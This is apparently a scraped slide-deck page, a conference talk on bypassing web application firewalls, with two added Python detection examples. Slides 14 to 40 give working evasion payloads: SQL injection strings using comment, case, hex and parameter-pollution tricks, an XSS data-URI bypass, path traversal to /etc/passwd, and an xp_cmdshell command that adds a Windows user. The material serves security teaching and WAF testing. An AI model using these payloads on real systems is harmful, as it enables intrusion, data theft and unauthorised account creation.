Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousFrancis Alexander
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 

Similaire à Introduction to Web Application Firewall (WAF (20)

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Virtually Pwned
Virtually PwnedVirtually Pwned
Virtually Pwned
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Technical Architecture of RASP Technology
Technical Architecture of RASP TechnologyTechnical Architecture of RASP Technology
Technical Architecture of RASP Technology
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 

Plus de Prathan Phongthiproek

The CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationThe CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationPrathan Phongthiproek
 
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationCyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationPrathan Phongthiproek
 
OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! Prathan Phongthiproek
 
Don't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksDon't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksPrathan Phongthiproek
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Prathan Phongthiproek
 
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingOWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingPrathan Phongthiproek
 
Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Prathan Phongthiproek
 
CDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopCDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopPrathan Phongthiproek
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetPrathan Phongthiproek
 
Tisa-Social Network and Mobile Security
Tisa-Social Network and Mobile SecurityTisa-Social Network and Mobile Security
Tisa-Social Network and Mobile SecurityPrathan Phongthiproek
 

Plus de Prathan Phongthiproek (20)

Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)
 
The CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationThe CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team Operation
 
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationCyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application Exploitation
 
Mobile App Hacking In A Nutshell
Mobile App Hacking In A NutshellMobile App Hacking In A Nutshell
Mobile App Hacking In A Nutshell
 
Introduction to Web Application Firewall (WAF)

  • 1. Web Application Firewall (WAF) Suckseed or Succeed !?
       Mr.Prathan Phongthiproek, Consulting Manager, Red Team, ACIS Professional Center
  • 2. Who am I ?
       ACIS Professional Center: Manager of the Red Team; Specializing in Attack & Penetration; Information Security Consulting Manager; Instructor and Speaker
       Founder of CWH Underground Hacker, aka 0x7a657133756c
  • 3. Let’s Reveal
       Introduction to Web Application Firewall (WAF)
       Breach it !!: Filter Evasion; HTTP Parameter Contamination; HTTP Pollution: Split and Join
       Conclusion
  • 5. Web Application Hacking
       7 of 10 sites are vulnerable; 70% of cyber attacks are on web ports; 95% of companies are hacked through web ports
       Anonymous and Lulzsec; Hacker with Operation #AntiSec
  • 6. Web Application Hacking
       Top 3 Web App Attacks: Cross Site Scripting; File Inclusion (Remote/Local); SQL Injection (Normal/Blind/Time based/Regex...)
  • 7. Misunderstanding about Hardening a Web Application
  • 8. What’s WAF ?
       Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
       Usually contain a lot of complex reg-exp rules to match (Blacklist)
       For most WAF vendors they are “closely guarded secrets”
       Open-source WAFs (Mod_security and PHPIDS) have open-source rules
  • 10. Detection and Protection
       SQL Injection; Cross Site Scripting; Local and Remote File Inclusion; Code/Command Injection; Directory Traversal; Buffer Overflow; Cookie Poisoning; Parameter Tampering; Upload File Mis-Handling; Information Disclosure; Etc...
  • 11. WAFs Vendors
       Armorize, Bee-ware, Barracuda, BinarySec, Cisco ACE, Mod Security, Citrix Netscaler, WebKnight, F5, DenyAll, Imperva SecureSphere, Fortify, Radware Appwall, Visonys, Profense, Pentasecurity, Other..
  • 13. Breach it !! (CMS and WAFs)
       “We've got it under control, we've got it under con.......it's burst!”
  • 14. Filter Evasion (SQLi)
       PHP: Magic_quote On, Mysql_real_escape_string, Addslashes (' " -> \' \")
       id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
  • 15. Filter Evasion (SQLi)
       PHP: Magic_quote On, Mysql_real_escape_string, Addslashes (' " -> \' \")
       id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
  • 16. Filter Evasion (SQLi)
       PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
       String to ASCII:
       id=1 and 1=2 union select 1,load_file(CHAR(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
  • 17. Filter Evasion (SQLi)
       Comments: //, --, /**/, /*, #, %00
       id=1+un/**/ion+se/**/lect+1,2,3--
       Case Changing (lower-case filter /union\sselect/g)
       id=1+UnIoN/**/SeLecT/**/1,2,3--
       Replaced keywords
       id=1+UnunionIoN+SeselectLecT+1,2,3--
  • 18. Filter Evasion (SQLi)
       Case Study: NukeSentinel (PHP Nuke): Encode to Hex
       Forbidden: http://victim.com/php-nuke/?/**/union/**/select.......
       Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select.......
       Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......
  • 19. Filter Evasion (SQLi)
       Buffer Overflow (For C language)
       id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT+1,version(),3,database(),user(),6,7,8,9,10--
  • 20. Filter Evasion (SQLi)
       Inline Comments (/*!......*/)
       A lot of WAFs were bypassed; bypasses IPS and timeouts
       MySQL only (http://dev.mysql.com/doc/refman/5.0/en/comments.html)
       Filter /union\sselect/ig
       id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
  • 21. Filter Evasion (SQLi)
       Inline Comments (/*!......*/)
  • 23. Filter Evasion (SQLi)
       Other Bypasses:
       and -> &&
       or -> ||
       = -> like
       substring() -> substr(), mid(), strcmp()
       ascii() -> hex(), bin(), char(), ord()
       benchmark() -> sleep()
       Whitespace -> (), /**/, %0b
       isnull, between
  • 24. Filter Evasion (SQLi) Case Study: PHPIDS
  • 25. Filter Evasion (SQLi) Case Study: PHPIDS
  • 26. Filter Evasion (SQLi) Case Study: PHPIDS
  • 27. Filter Evasion (SQLi)
       Case Study: Mod Security CRS
       SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" "phase:2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
  • 28. Filter Evasion (SQLi)
       Case Study: Mod Security CRS
       http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
       URL-decoded (CR/LF shown as line breaks):
         0 div 1 union#foo*/*bar
         select#foo
         1,2,current_user
       As MySQL parses it (a # comment runs to end of line): 0 div 1 union select 1,2,current_user
  • 29. Filter Evasion
       Cross Site Scripting (XSS)
       Forbidden: http://victim.com/search.php?q=javascript:alert('XSS')
       Bypass: http://victim.com/search.php?q=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
       File Inclusion
       Forbidden: http://victim.com/download.php?file=../../../etc/passwd
       Bypass: http://victim.com/download.php?file=../../../etc/passwd..........
       Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../passwd
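Added example (not from the slides): a Python check that runs the union/select pattern of the CRS rule on slide 27 over two views of a parameter value, a CRS-style normalization that only understands C comments, and a MySQL-aware one that also treats `#` line comments and `/*! */` bodies the way the server does. It reproduces the slide 20 and slide 28 evasions as constructed inputs and shows that only the view matching the backend's parser catches them; both normalizers are approximations written for this example, not ModSecurity code.

```python
import re
from urllib.parse import unquote_plus

# The union/select pattern of CRS rule 959047 quoted on slide 27 (backslashes restored).
UNION_SELECT = re.compile(r"\bunion\b.{1,100}?\bselect\b", re.I | re.S)

def crs_normalize(value: str) -> str:
    """Approximation (written for this example) of the slide's transformation chain:
    lowercase, replaceComments (C-style comments only; an unterminated comment becomes
    a space), compressWhiteSpace. A '#' is ordinary text to this chain."""
    value = re.sub(r"/\*.*?(?:\*/|\Z)", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value).strip()

# How the MySQL lexer reads comments (see the manual page cited on slide 20):
# '#' and '-- ' run to end of line, the body of /*! ... */ is executed as code,
# and an ordinary /* ... */ is whitespace. Assumption: this regex is our own model.
MYSQL_COMMENT = re.compile(
    r"#[^\r\n]*|--[ \t][^\r\n]*"          # line comments
    r"|/\*!\d*(?P<exec>.*?)\*/"           # executable comment: keep the body
    r"|/\*.*?(?:\*/|\Z)",                 # block comment, unterminated too
    re.S)

def mysql_normalize(value: str) -> str:
    """Normalize the value the way MySQL will actually parse it."""
    def repl(m):
        body = m.group("exec")
        return " " + body + " " if body is not None else " "
    return re.sub(r"\s+", " ", MYSQL_COMMENT.sub(repl, value).lower()).strip()

def inspect_param(raw_param: str) -> dict:
    """Apply the rule to a URL-encoded parameter value under both views."""
    decoded = unquote_plus(raw_param)
    return {"crs": bool(UNION_SELECT.search(crs_normalize(decoded))),
            "mysql": bool(UNION_SELECT.search(mysql_normalize(decoded)))}

# Constructed inputs reproducing the evasions on slide 20 and slide 28.
INLINE_COMMENT = ("1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)"
                  "+FrOm/*!information_schema*/.tables")
HASH_NEWLINE = "0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user"

if __name__ == "__main__":
    for label, raw in (("inline comment", INLINE_COMMENT), ("#-newline", HASH_NEWLINE)):
        print(label, inspect_param(raw), "| mysql view:", mysql_normalize(unquote_plus(raw)))
```

The point for a defender is that a blacklist is only as good as its normalization: the rule itself is fine, but the transformation chain has to model the comment syntax of the database actually behind the WAF.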
  • 31. HTTP Parameter Contamination
       Bypass Mod_Security SQLi rule (modsecurity_crs_41)
       Bypass URLScan 3.1 DenyQueryStringSequences rules
       Bypass AQTRONIX Webknight WAF with “%”
  • 32. HTTP Parameter Contamination
       Case Study: AQTRONIX Webknight
       http://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
       As sent: 10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
       As the backend sees it: 10 and 1=0/(select top 1 table_name from information_schema.tables)
  • 33. HTTP Pollution: Split and Join
       HPP is a quite simple but effective hacking technique
       HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string
       Focus on ASP/ASP.net
       A lot of WAFs were bypassed
  • 37. HTTP Pollution: Split and Join
       Basic Attack
       Forbidden: http://victim.com/search.aspx?q=select name,password from user
       Bypass: http://victim.com/search.aspx?q=select name&q=password from user
       q=select name
       q=password from user
       Joined by the backend: q=select name,password from user
  • 38. HTTP Pollution: Split and Join
       HPP + Inline Comment (Bypass Commercial WAF)
       Forbidden: http://victim.com/search.aspx?q=select name,password from user
       Bypass: http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user
       q=select/*
       q=*/name
       q=password/*
       q=*/from/*
       q=*/user
       Joined: q=select/*,*/name,password/*,*/from/*,*/user
       Effective: q=select name,password from user
  • 40. HTTP Pollution: Split and Join
       Case study: IBM Web Application Firewall (2011-6-21)
       Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT /add” --
       Bypass: http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --
       id=1'; /*
       id=1*/ EXEC /*
       id=1*/ master..xp_cmdshell /*
       id=1*/ “net user lucifer UrWaFisShiT” /*
       id=1*/ --
       Joined: id=1'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user lucifer UrWaFisShiT” /*,1*/ --
       Effective: id=1'; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT” --
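Added example (not from the slides): a Python check for the split-and-join case on slides 37 and 38 that rebuilds each parameter as ASP/ASP.NET hands it to the application (values of a repeated name joined with ',') and inspects that view instead of, or in addition to, each value on its own; it also reports duplicated parameter names, which a WAF can simply reject. The join rule, the comment stripping and the simple select/from pattern are assumptions made for this example; victim.com is the slides' placeholder host.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Statement shape used on slides 37 and 38 (a pattern constructed for this example).
SELECT_FROM = re.compile(r"\bselect\b.{1,200}?\bfrom\b", re.I | re.S)

def backend_view(query: str) -> dict:
    """Rebuild each parameter as ASP/ASP.NET hands it to the application: values of
    a repeated name are concatenated with ','. (Other stacks differ: PHP keeps only
    the last value, so the join rule must match the backend actually in use.)"""
    joined = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        joined[name] = value if name not in joined else joined[name] + "," + value
    return joined

def strip_comments(sql: str) -> str:
    """Drop /* ... */ comments and squeeze whitespace, as the SQL parser will."""
    return re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)).strip()

def inspect_query(url: str) -> dict:
    """Compare a per-value check (how a naive WAF looks) with the backend's view."""
    query = urlsplit(url).query
    pairs = parse_qsl(query, keep_blank_values=True)
    names = [n for n, _ in pairs]
    joined = backend_view(query)
    return {
        "duplicate_params": sorted({n for n in names if names.count(n) > 1}),
        "per_value_hit": any(SELECT_FROM.search(v) for _, v in pairs),
        "backend_view_hit": any(SELECT_FROM.search(strip_comments(v)) for v in joined.values()),
        "backend_sees": strip_comments(joined.get("q", "")),
    }

# Constructed URLs reproducing slides 37 and 38; victim.com is the slides' placeholder host.
SPLIT_URL = "http://victim.com/search.aspx?q=select name&q=password from user"
COMMENT_URL = "http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user"

if __name__ == "__main__":
    for url in (SPLIT_URL, COMMENT_URL):
        print(inspect_query(url))
```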
  • 41. “Thailand needs change. It is time for everyone in the country to wake up. Ignorance must come to an end.”
  • 42. How to protect your website ?
       Implement a Secure Software Development Life Cycle (SSDLC)
       Secure Coding: Validate all inputs and outputs
       Pentest before going online
       Harden it !!
       Re-visit again
       Deploy WAF (Optional)
  • 43. Conclusion
       WAF is not the long-expected answer: due to its functional limitations, a WAF is not able to protect a web app from all possible vulnerabilities
       It is necessary to adapt WAF filters to the particular web app being protected
       WAF doesn't eliminate a vulnerability, it just partly screens the attack vector
       Suckseed or succeed !?
       “Security products are not able to 100% protect from damn config/coding of admins. Just need time and imagination to breach it !!”
  • 44. Greetz To..
       ACIS-Red Team, Kyle, Johannes Dahse, Ahmad Maulana, Luca Carettoni, Stefano di Paola, Ivan Markovic
       All WAF products that I breached